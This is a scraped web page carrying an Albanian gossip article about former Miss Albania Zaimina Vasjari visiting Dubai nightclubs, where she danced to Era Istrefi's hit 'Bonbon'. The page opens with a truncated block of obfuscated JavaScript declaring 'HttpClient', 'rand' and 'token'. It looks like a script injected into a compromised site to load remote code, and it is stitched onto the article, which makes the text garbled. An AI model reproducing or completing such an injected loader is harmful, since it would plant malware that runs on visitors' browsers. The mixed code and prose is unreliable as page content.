;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çka i ndodhi Zaimina Vasjarit në klubet e natës në Dubai?!

By

Muajt e nxehtë të verës kur të gjithë dynden drejt bregdetit, për bukuroshen Zaimina Vasjari ishin pak më ndryshe se të shumicës dërmuese.

Kjo për faktin se e angazhuar me hapjen e dyqanit të ri të saj në qendër të Tiranës, energjitë dhe kohën bukuroshja e kishte të drejtuar vetëm tek kjo pjesë duke mos pasur hapësirë për pushime të gjata.

E duket se periudha dhe destinacioni ideal janë gjetur nga Zaimina tek tani në muajin Tetor kur dyqani ‘ka marrë këmbët’ megjithëse pos qejfit, bukuroshja ia ka mësyer Dubait edhe për punë.

Por, krahas shijimit të plazheve dhe atraksioneve turistike që ofron ky vend, Vasjari gjatë qëndrimit nuk ka lënë anash as jetën e natës.

Ish-Miss Shqipëria ka frekuentuar klubet ku ka hasur në një moment të veçantë – kërcimin nën ritmet e këngëve shqip. Këtë e ka mundësuar kush tjetër përpos Era Istrefit me hitin e saj ‘Bonbon’ që ka gëzuar shumë Zaiminën për faktin e depërtimit të një kolegeje në klubet më luksoze të vendit arab.

Krenarinë me senzacionin e muzikës pop, Vasjari e ka ndarë me fansat në Instagram. /Prive.al/

 

Artikuj të ngjashëm